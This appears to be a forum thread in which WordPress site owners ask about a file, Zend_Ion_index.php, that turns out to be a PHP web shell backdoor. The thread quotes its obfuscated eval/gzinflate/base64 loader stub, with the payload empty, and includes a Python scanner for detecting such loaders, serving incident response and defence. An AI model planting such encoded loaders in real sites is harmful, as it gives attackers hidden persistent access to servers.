I checked my WordPress servers daily... found this newly updated file, Zend_Ion_index.php, and deleted it. Just wondering, what does this do? So that I can further check if my files are infected. I changed my FTP password and did a scan on the PC already. I found several other sites online infected with this too. It seems like it opens a password code thing to change the files on the server?

```php
<?PHP
# Web Shell by oRb
$auth_pass = "439b9c85f0bc1db31c288d84a04fdb8a";
$color = "#df5";
$default_use_ajax = true;
$default_charset = 'Windows-1251';
$o = ;
eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B");
?>
```
That is a PHP-based "shell". It allows a hacker to have access to your files and the server your website is hosted on. Generally people put up a "shell" so that if you fix the original way they hacked your website, they will still have access so they can gain access in the future. It appears that they have encoded the actual code for the shell so as to avoid server antivirus. Smart move removing that. You should check your logs and figure out how it got there in the first place to avoid it happening again. You also might want to change your administrator password.
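A way to check other files for the encoded loader described above, as an added example that is not part of the original thread: it resolves the hex and octal escapes in double-quoted PHP strings and flags an `eval()` fed directly by a decoder call, plus the `$auth_pass` config line. The function names, the all-zero hash and the `PLACEHOLDER` payload in `SAMPLE` are constructed for illustration.

```python
import re
from pathlib import Path

# Escapes PHP resolves inside double-quoted strings: \xHH, \NNN (octal), other \c.
_ESCAPE = re.compile(r'\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3})|(.))', re.S)
_DQ_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
# eval() fed directly by a decoder or decompressor call.
_LOADER = re.compile(
    r'\beval\s*\(\s*(?:gzinflate|gzuncompress|gzdecode|base64_decode|str_rot13)\s*\(', re.I)
# Config line as in the posted sample: $auth_pass set to a 32-hex-digit string.
_AUTH_PASS = re.compile(r'\$auth_pass\s*=\s*["\'][0-9a-f]{32}["\']', re.I)

def decode_php_escapes(literal):
    """Resolve \\xHH and octal escapes as PHP would; keep other escapes as written."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 8) & 0xFF)  # PHP wraps octal values above 0xFF
        return m.group(0)
    return _ESCAPE.sub(repl, literal)

def scan_php(source):
    """Return (indicator, evidence) tuples found in one PHP source string."""
    findings = [(name, m.group(0))
                for name, rx in (("auth_pass", _AUTH_PASS), ("loader", _LOADER))
                for m in [rx.search(source)] if m]
    # Single-quoted PHP strings do not interpret escapes, so only "..." is decoded.
    for lit in _DQ_LITERAL.finditer(source):
        decoded = decode_php_escapes(lit.group(1))
        if decoded != lit.group(1) and _LOADER.search(decoded):
            findings.append(("escaped-loader", decoded))
    return findings

def scan_tree(root):
    """Scan every .php file (any case) under root; return {path: findings} for hits."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() == ".php":
            found = scan_php(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample: loader line as posted above; hash and payload are placeholders.
SAMPLE = r'''<?php $auth_pass = "00000000000000000000000000000000"; $o = "PLACEHOLDER";
eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B"); ?>'''
```

Calling `scan_tree()` on a web root returns only the files with hits. A hit is a lead for manual review of that file and its modification time, not proof of compromise.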
Hello: I found the same file on my server, "Zend_Ion_Index.Php". The account with this file is empty, not related to a WordPress installation. If you search Google for this file, a lot of compromised sites appear. I don't know the vulnerability yet. Maybe PHP 5.3.9, because the file was created before an update to 5.3.10... Please, if you have more information, post it. Thank you very much.